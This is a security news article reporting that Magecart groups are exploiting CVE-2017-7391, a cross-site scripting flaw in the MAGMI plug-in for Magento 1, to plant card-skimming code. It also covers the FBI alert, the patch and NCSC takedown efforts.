Hackers are widely exploiting a 2017 vulnerability in a Magento plug-in that allows them to take over a user’s e-commerce website and embed malicious code that enables the skimming of credit card data.
Magento, bought by Adobe for $1.68 billion in May 2018, is an open-source ecommerce platform that lets users build online stores/process payments. Due to the nature of the data it processes it is a prime target for threat actors looking to steal shoppers’ financial credentials.
It has persistently proven a juicy vector for attacks.
The FBI warned in a flash alert earlier this month that hackers known as Magecart (actually a wide variety of groups) have been placing “e-skimming script directly on e-commerce websites and use HTTP GET requests to exfiltrate the stolen payment data via proxy compromised websites” using the 2017 vuln.
All a victim would see on the e-commerce website would be a very small additional ‘snippet’ of script that has been added to the website’s source code. (This may seem old-hat to security specialists, but it remains a rampant problem and a profitable one for cyber criminals).
Magento CVE Being Exploited
The particular vulnerability being exploited was first discovered three years ago when it was given the superficially un-alarming CVSS score of 6.1.
CVE-2017-7391 is a Cross-site scripting (XXS) vulnerability within the plug-in MAGMI, version 0.7.22. The bug allows a hacker to execute arbitrary HTML and script code within a browser affecting the e-commerce website.
The simplest fix for the issue appears to be updating the MAGMI plugin to version 0.7.23 as this has a fix for the XXS attack. The MAGMI plug-in only works on older versions of Magento powered sites, in particular what’s known as Magento Commerce 1. (Compounding the problem, this older Magento version will be unsupported from the end of June 2020.)
Using the vulnerability CVE-2017-7391 cyber criminals are exploiting websites by injecting them with malicious Hypertext Preprocessor (PHP) files. These PHP files allow hackers to scrape the payment card data and sensitive customer’s information such as address and contact details.
Magento’s security appears to need serious work: just last month Adobe released a security update that patched six critical vulnerabilities within Magento Commerce and its Open Source editions.
The vulnerabilities were serious: two allowed a security bypass, while the other four enabled hackers to manipulate sites via command injections. All of these bugs allow hackers to seriously damage users e-commerce sites and steal customer data. Adobe is urging its Magento users to patch their shops immediately with the patches that can be found in its security bulletin.
In its third annual report, a review of its work in 2019, the UK’s National Cyber Security Centre (NCSC) highlighted that Magento is a prime target for hackers and added that it had “conducted a successful trial to identify and mitigate vulnerable Magento carts via take down to protect the public. The work now continues. To date, the NCSC has taken down 1,102 attacks running skimming code (with 19 percent taken down within 24 hours of discovery)”